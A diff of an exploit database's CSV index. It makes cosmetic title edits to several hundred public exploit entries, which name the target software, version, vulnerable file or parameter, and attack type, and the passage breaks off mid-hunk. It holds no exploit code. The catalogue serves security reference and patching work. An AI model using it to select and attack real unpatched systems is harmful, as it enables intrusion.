-27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - SEH Buffer Overflow",2013-08-21,Wireghoul,windows,remote,21 +27747,platforms/windows/remote/27747.pl,"freeFTPd 1.0.10 (PASS Command) - Buffer Overflow (SEH)",2013-08-21,Wireghoul,windows,remote,21 27749,platforms/hardware/dos/27749.rb,"Schneider Electric PLC ETY Series Ethernet Controller - Denial of Service",2013-08-21,"Arash Abedian",hardware,dos,0 27750,platforms/php/webapps/27750.py,"Bitbot C2 Panel - gate2.php Multiple Vulnerabilities",2013-08-21,bwall,php,webapps,0 27751,platforms/php/webapps/27751.txt,"WordPress ThinkIT Plugin 0.1 - Multiple Vulnerabilities",2013-08-21,"Yashar shahinzadeh",php,webapps,0 @@ -24891,7 +24892,7 @@ id,file,description,date,author,platform,type,port 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - signup.php referral Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - members.php id Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 -27790,platforms/osx/dos/27790.txt,"Apple Mac OS X 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 +27790,platforms/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,osx,dos,0 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0 27792,platforms/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps,0 27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - POS Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 @@ -25043,7 +25044,7 @@ id,file,description,date,author,platform,type,port 27941,platforms/php/remote/27941.rb,"SPIP - connect Parameter PHP Injection",2013-08-29,Metasploit,php,remote,0 27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0 27943,platforms/windows/remote/27943.txt,"Oracle Java - ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote,0 -27944,platforms/osx/local/27944.rb,"Apple Mac OS X - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 +27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass",2013-08-29,Metasploit,osx,local,0 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 @@ -25064,10 +25065,10 @@ id,file,description,date,author,platform,type,port 27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0 -27965,platforms/osx/local/27965.py,"Apple Mac OS X 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 +27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 27992,platforms/unix/remote/27992.txt,"FreeType - '.TTF' File Remote Buffer Overflow",2006-06-08,"Josh Bressers",unix,remote,0 27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0 -27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 - UserName SQL Injection",2006-06-05,FarhadKey,php,webapps,0 +27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 - 'Username' SQL Injection",2006-06-05,FarhadKey,php,webapps,0 27980,platforms/php/webapps/27980.txt,"Alex DownloadEngine 1.4.1 - comments.php SQL Injection",2006-06-05,ajann,php,webapps,0 27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0 27982,platforms/php/webapps/27982.txt,"GANTTy 1.0.3 - 'index.php' Cross-Site Scripting",2006-06-06,Luny,php,webapps,0 @@ -25138,14 +25139,14 @@ id,file,description,date,author,platform,type,port 28072,platforms/php/webapps/28072.txt,"V3 Chat Instant Messenger - profile.php site_id Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28073,platforms/php/webapps/28073.txt,"V3 Chat Instant Messenger - profileview.php membername Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 28074,platforms/php/webapps/28074.txt,"V3 Chat Instant Messenger - expire.php cust_name Parameter Cross-Site Scripting",2006-06-20,Luny,php,webapps,0 -28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List manipulation",2006-06-20,Luny,php,webapps,0 +28075,platforms/php/webapps/28075.txt,"V3 Chat Instant Messenger - mycontacts.php membername Arbitrary User Buddy List Manipulation",2006-06-20,Luny,php,webapps,0 28076,platforms/php/webapps/28076.txt,"vBulletin 3.0.9/3.5.x - member.php Cross-Site Scripting",2006-06-20,CrAzY.CrAcKeR,php,webapps,0 28077,platforms/linux/dos/28077.txt,"GnuPG 1.4.3/1.9.x - Parse_User_ID Remote Buffer Overflow",2006-06-20,"Evgeny Legerov",linux,dos,0 28078,platforms/php/webapps/28078.txt,"e107 0.7.5 - Subject field HTML Injection",2006-06-21,"EllipSiS Security",php,webapps,0 28084,platforms/windows/local/28084.html,"KingView 6.53 - Insecure ActiveX Control (SuperGrid)",2013-09-04,blake,windows,local,0 28079,platforms/windows/dos/28079.py,"jetAudio 8.0.16.2000 Plus VX - '.wav' Crash (PoC)",2013-09-04,ariarat,windows,dos,0 28080,platforms/windows/dos/28080.py,"GOMPlayer 2.2.53.5169 - '.wav' Crash (PoC)",2013-09-04,ariarat,windows,dos,0 -28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OS X 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 +28081,platforms/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote,0 28082,platforms/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)",2013-09-04,Metasploit,windows,remote,0 28083,platforms/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution",2013-09-04,Metasploit,windows,remote,0 28086,platforms/asp/webapps/28086.txt,"Maximus SchoolMAX 4.0.1 - Error_msg Parameter Cross-Site Scripting",2006-06-21,"Charles Hooper",asp,webapps,0 @@ -25189,13 +25190,13 @@ id,file,description,date,author,platform,type,port 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value Parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 -28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 +28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass (SQL Injection)",2013-09-06,shiZheni,php,webapps,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL",2013-09-06,Metasploit,windows,local,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 28132,platforms/php/webapps/28132.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28133,platforms/php/webapps/28133.txt,"newsPHP 2006 PRO - 'index.php' Multiple Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 28134,platforms/php/webapps/28134.txt,"newsPHP 2006 PRO - inc/rss_feed.php category Parameter SQL Injection",2006-06-29,securityconnection,php,webapps,0 -28135,platforms/osx/dos/28135.pl,"Apple Mac OS X 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos,0 +28135,platforms/osx/dos/28135.pl,"Apple Mac OSX 10.4.x - OpenLDAP Denial of Service",2006-06-27,"Mu Security research",osx,dos,0 28136,platforms/php/webapps/28136.pl,"Vincent-Leclercq News 5.2 - Diver.php SQL Injection",2006-06-23,DarkFig,php,webapps,0 28137,platforms/php/webapps/28137.txt,"SoftBiz Banner Exchange Script 1.0 - insertmember.php city Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 28138,platforms/php/webapps/28138.txt,"SoftBiz Banner Exchange Script 1.0 - lostpassword.php PHPSESSID Parameter Cross-Site Scripting",2006-06-29,securityconnection,php,webapps,0 @@ -25620,12 +25621,12 @@ id,file,description,date,author,platform,type,port 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - admin/inc/footer.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - admin/inc/header.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 -28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php' username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 +28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php' 'Username' Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion",2006-09-14,"Saudi Hackrz",php,webapps,0 -28576,platforms/osx/local/28576.txt,"Apple Mac OS X 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 +28576,platforms/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 28577,platforms/asp/webapps/28577.txt,"ClickBlog! 2.0 - default.asp SQL Injection",2006-09-14,ajann,asp,webapps,0 -28578,platforms/osx/dos/28578.txt,"Apple Mac OS X 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos,0 +28578,platforms/osx/dos/28578.txt,"Apple Mac OSX 10.x - KExtLoad Buffer Overflow",2006-09-14,"Adriel T. Desautels",osx,dos,0 28579,platforms/php/webapps/28579.txt,"MyBulletinBoard 1.x - 'index.php' Cross-Site Scripting",2006-09-15,"HACKERS PAL",php,webapps,0 28580,platforms/php/webapps/28580.txt,"NextAge Cart - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-09-13,meto5757,php,webapps,0 28581,platforms/php/webapps/28581.txt,"Jupiter CMS 1.1.4/1.1.5 - galleryuploadfunction.php Arbitrary File Upload",2006-09-15,"HACKERS PAL",php,webapps,0 @@ -25653,7 +25654,7 @@ id,file,description,date,author,platform,type,port 28603,platforms/php/webapps/28603.txt,"Innovate Portal 2.0 - 'index.php' Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28604,platforms/php/webapps/28604.txt,"ESyndiCat 1.5 - search.php Cross-Site Scripting",2006-09-19,meto5757,php,webapps,0 28605,platforms/jsp/webapps/28605.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - downloadfile Servlet Traversal Arbitrary File Access",2006-09-20,"Tan Chew Keong",jsp,webapps,0 -28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 +28606,platforms/jsp/webapps/28606.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updatemail Servlet - Arbitrary Mail Message Manipulation",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28607,platforms/jsp/webapps/28607.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - addrlist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28608,platforms/jsp/webapps/28608.txt,"NeoSys Neon Webmail for Java 5.06/5.07 - maillist Servlet Multiple Parameter SQL Injection",2006-09-20,"Tan Chew Keong",jsp,webapps,0 28609,platforms/jsp/webapps/28609.txt,"NeoSys Neon Webmail for Java 5.06/5.07 updateuser Servlet - in_id Variable Arbitrary User Information Modification",2006-09-20,"Tan Chew Keong",jsp,webapps,0 @@ -25688,9 +25689,9 @@ id,file,description,date,author,platform,type,port 28638,platforms/php/webapps/28638.txt,"Grayscale BandSite CMS 1.1 - footer.php this_year Parameter Cross-Site Scripting",2006-09-21,"HACKERS PAL",php,webapps,0 28639,platforms/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,linux,remote,0 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0 -28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File manipulation",2006-09-21,"Patrick Webster",windows,remote,0 +28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0 -28643,platforms/osx/remote/28643.txt,"Apple Mac OS X 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 +28643,platforms/osx/remote/28643.txt,"Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote,0 28644,platforms/php/webapps/28644.txt,"Google Mini Search Appliance 4.4.102.M.36 - Information Disclosure",2006-09-22,"Patrick Webster",php,webapps,0 28645,platforms/php/webapps/28645.txt,"CakePHP 1.1.7.3363 - Vendors.php Directory Traversal",2006-09-22,"James Bercegay",php,webapps,0 28646,platforms/php/webapps/28646.txt,"mysource 2.14.8/2.16 - Multiple Vulnerabilities",2006-09-22,"Patrick Webster",php,webapps,0 @@ -25913,7 +25914,7 @@ id,file,description,date,author,platform,type,port 28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - Aff_News.php Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6 - Unspecified Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 -28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php' username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 +28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php' 'Username' Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0 28881,platforms/php/webapps/28881.txt,"Foresite CMS - Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 @@ -25984,14 +25985,14 @@ id,file,description,date,author,platform,type,port 28945,platforms/php/webapps/28945.txt,"PHPMyChat Plus 1.9 - Multiple Local File Inclusion",2006-11-08,ajann,php,webapps,0 28946,platforms/php/webapps/28946.txt,"Portix-PHP 0.4.2 - Multiple SQL Injections",2006-11-08,"Benjamin Moss",php,webapps,0 28947,platforms/php/webapps/28947.txt,"Speedywiki 2.0/2.1 - Multiple Input Validation Vulnerabilities",2006-11-08,"laurent gaffie",php,webapps,0 -28948,platforms/osx/dos/28948.c,"Apple Mac OS X 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 +28948,platforms/osx/dos/28948.c,"Apple Mac OSX 10.x - FPathConf System Call Local Denial of Service",2006-11-09,"ilja van sprundel",osx,dos,0 28949,platforms/php/webapps/28949.txt,"bitweaver 1.x - newsletters/edition.php tk Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 28950,platforms/php/webapps/28950.txt,"LandShop 0.6.3 - ls.php Multiple Parameter Cross-Site Scripting",2006-11-09,"laurent gaffie",php,webapps,0 28951,platforms/php/webapps/28951.txt,"LandShop 0.6.3 - ls.php Multiple Parameter SQL Injection",2006-11-09,"laurent gaffie",php,webapps,0 28952,platforms/php/webapps/28952.txt,"Omnistar Article Manager - Multiple SQL Injections",2006-11-09,"Benjamin Moss",php,webapps,0 28953,platforms/php/webapps/28953.txt,"Bitweaver 1.x - blogs/list_blogs.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 28954,platforms/php/webapps/28954.txt,"Bitweaver 1.x - fisheye/list_galleries.php sort_mode Parameter SQL Injection",2006-11-10,"laurent gaffie",php,webapps,0 -28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow SEH",2013-10-14,metacom,windows,local,0 +28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0 28956,platforms/php/webapps/28956.txt,"StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading",2013-10-14,spiderboy,php,webapps,80 28957,platforms/android/dos/28957.txt,"Android Zygote - Socket and Fork bomb Attack",2013-10-14,"Luca Verderame",android,dos,0 28959,platforms/php/webapps/28959.txt,"WordPress Cart66 Plugin 1.5.1.14 - Multiple Vulnerabilities",2013-10-14,absane,php,webapps,80 @@ -26004,14 +26005,14 @@ id,file,description,date,author,platform,type,port 28966,platforms/php/webapps/28966.txt,"Drake CMS 0.2 - 'index.php' Cross-Site Scripting",2006-11-10,CorryL,php,webapps,0 28967,platforms/php/webapps/28967.txt,"ExoPHPDesk 1.2 - Pipe.php Remote File Inclusion",2006-11-11,Firewall1954,php,webapps,0 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 -28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - SEH Buffer Overflow",2013-10-15,metacom,windows,local,0 +28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0 28970,platforms/php/webapps/28970.txt,"Dexs PM System WordPress Plugin - Authenticated Persistent Cross-Site Scripting",2013-10-15,TheXero,php,webapps,80 28971,platforms/php/webapps/28971.py,"Dolibarr ERP/CMS 3.4.0 - (exportcsv.php sondage Parameter) SQL Injection",2013-10-15,drone,php,webapps,80 28972,platforms/unix/webapps/28972.rb,"Zabbix 2.0.8 - SQL Injection / Remote Code Execution (Metasploit)",2013-10-15,"Jason Kratzer",unix,webapps,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow",2013-10-15,Metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)",2013-10-15,Metasploit,windows,remote,0 28975,platforms/ios/webapps/28975.txt,"My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 -28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Include",2013-10-15,Vulnerability-Lab,ios,webapps,0 +28976,platforms/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - File Inclusion",2013-10-15,Vulnerability-Lab,ios,webapps,0 28977,platforms/ios/webapps/28977.txt,"UbiDisk File Manager 2.0 iOS - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,ios,webapps,0 28978,platforms/ios/webapps/28978.txt,"Apple iOS 7.0.2 - Sim Lock Screen Display Bypass",2013-10-15,Vulnerability-Lab,ios,webapps,0 28979,platforms/linux/webapps/28979.txt,"DornCMS Application 1.4 - Multiple Web Vulnerabilities",2013-10-15,Vulnerability-Lab,linux,webapps,0 @@ -26183,11 +26184,11 @@ id,file,description,date,author,platform,type,port 29141,platforms/asp/webapps/29141.txt,"The Classified Ad System 3.0 - default.asp Multiple Parameter Cross-Site Scripting",2006-11-20,"laurent gaffie",asp,webapps,0 29142,platforms/asp/webapps/29142.txt,"Klf-Realty 2.0 - search_listing.asp Multiple Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 29143,platforms/asp/webapps/29143.txt,"Klf-Realty 2.0 - detail.asp property_id Parameter SQL Injection",2006-11-20,"laurent gaffie",asp,webapps,0 -29144,platforms/osx/dos/29144.txt,"Apple Mac OS X 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 +29144,platforms/osx/dos/29144.txt,"Apple Mac OSX 10.4.8 - UDIF Disk Image Remote Denial of Service",2006-11-20,LMH,osx,dos,0 29145,platforms/php/webapps/29145.txt,"Wabbit PHP Gallery 0.9 - Dir Parameter Directory Traversal",2006-11-20,the_Edit0r,php,webapps,0 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - NWSPOOL.dll Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0 34371,platforms/windows/local/34371.py,"BlazeDVD Pro 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0 -29161,platforms/osx/dos/29161.txt,"Apple Mac OS X 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 +29161,platforms/osx/dos/29161.txt,"Apple Mac OSX 10.4.8 - UDTO Disk Image Remote Denial of Service",2006-11-21,LMH,osx,dos,0 29162,platforms/php/webapps/29162.txt,"My Little Weblog 2006.11.21 - Weblog.php Cross-Site Scripting",2006-11-21,the_Edit0r,php,webapps,0 29217,platforms/php/webapps/29217.txt,"CuteNews 1.3.6 - Result Parameter Cross-Site Scripting",2006-12-02,Detefix,php,webapps,0 29218,platforms/php/webapps/29218.txt,"PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities",2006-12-02,Detefix,php,webapps,0 @@ -26220,18 +26221,18 @@ id,file,description,date,author,platform,type,port 29187,platforms/php/webapps/29187.txt,"cPanel WebHost Manager 3.1 - dofeaturemanager feature Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29188,platforms/php/webapps/29188.txt,"cPanel WebHost Manager 3.1 - park ndomain Parameter Cross-Site Scripting",2006-11-25,"Aria-Security Team",php,webapps,0 29189,platforms/asp/webapps/29189.txt,"fipsShop - Multiple SQL Injections",2006-11-25,"Aria-Security Team",asp,webapps,0 -29190,platforms/osx/local/29190.txt,"Apple Mac OS X 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 +29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0 29191,platforms/asp/webapps/29191.txt,"ClickContact - default.asp Multiple SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29192,platforms/asp/webapps/29192.txt,"Clickblog - Displaycalendar.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29193,platforms/asp/webapps/29193.txt,"Click Gallery - Multiple Input Validation Vulnerabilities",2006-11-27,"Aria-Security Team",asp,webapps,0 -29194,platforms/osx/local/29194.c,"Apple Mac OS X 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 +29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0 29195,platforms/asp/webapps/29195.txt,"uPhotoGallery 1.1 - Slideshow.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29196,platforms/asp/webapps/29196.txt,"uPhotoGallery 1.1 - thumbnails.asp ci Parameter SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29197,platforms/asp/webapps/29197.txt,"Evolve Shopping Cart - products.asp SQL Injection",2006-11-27,"Aria-Security Team",asp,webapps,0 29198,platforms/php/webapps/29198.txt,"b2evolution 1.8.2/1.9 - _404_not_found.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 29199,platforms/php/webapps/29199.txt,"b2evolution 1.8.2/1.9 - _410_stats_gone.page.php app_name Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 29200,platforms/php/webapps/29200.txt,"b2evolution 1.8.2/1.9 - _referer_spam.page.php Multiple Parameter Cross-Site Scripting",2006-11-16,"lotto fischer",php,webapps,0 -29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 +29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0 29202,platforms/php/webapps/29202.txt,"Seditio1.10 / Land Down 8.0 Under - polls.php SQL Injection",2006-11-30,ajann,php,webapps,0 29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x - register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0 29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0 @@ -26313,7 +26314,7 @@ id,file,description,date,author,platform,type,port 29306,platforms/php/webapps/29306.txt,"A-Blog 1.0 - Unspecified Cross-Site Scripting",2006-12-22,Fukumori,php,webapps,0 29307,platforms/windows/dos/29307.c,"SoftMaker Office 2012 - TextMaker Memory Corruption",2013-10-30,"Arash Allebrahim",windows,dos,0 29308,platforms/php/webapps/29308.txt,"Oracle Portal 9i/10g - Container_Tabs.jsp Cross-Site Scripting",2006-12-22,"putosoft softputo",php,webapps,0 -29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' SEH Buffer Overflow",2013-10-30,"Mike Czumak",windows,local,0 +29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (SEH)",2013-10-30,"Mike Czumak",windows,local,0 29310,platforms/multiple/dos/29310.txt,"WikiReader 1.12 - URL Field Local Buffer Overflow",2006-12-22,"Umesh Wanve",multiple,dos,0 29311,platforms/php/webapps/29311.txt,"Xt-News 0.1 - add_comment.php id_news Parameter Cross-Site Scripting",2006-12-22,Mr_KaLiMaN,php,webapps,0 29312,platforms/hardware/webapps/29312.txt,"Unicorn Router WB-3300NR - Cross-Site Request Forgery (Factory Reset/DNS Change)",2013-10-30,absane,hardware,webapps,0 @@ -26391,7 +26392,7 @@ id,file,description,date,author,platform,type,port 29383,platforms/linux/remote/29383.txt,"Adobe Reader 9.1.3 Plugin - Open Parameters Cross-Site Scripting",2007-01-03,"Stefano Di Paola",linux,remote,0 29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - search.asp Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 -29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - (SEH) Buffer Overflow (PoC)",2013-11-03,"Mike Czumak",windows,dos,0 +29387,platforms/windows/dos/29387.pl,"Plogue Sforzando 1.665 - Buffer Overflow (SEH) (PoC)",2013-11-03,"Mike Czumak",windows,dos,0 29475,platforms/multiple/remote/29475.txt,"Oracle January 2007 Security Update - Multiple Vulnerabilities",2007-01-16,"Esteban Martinez Fayo",multiple,remote,0 29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0 @@ -26445,7 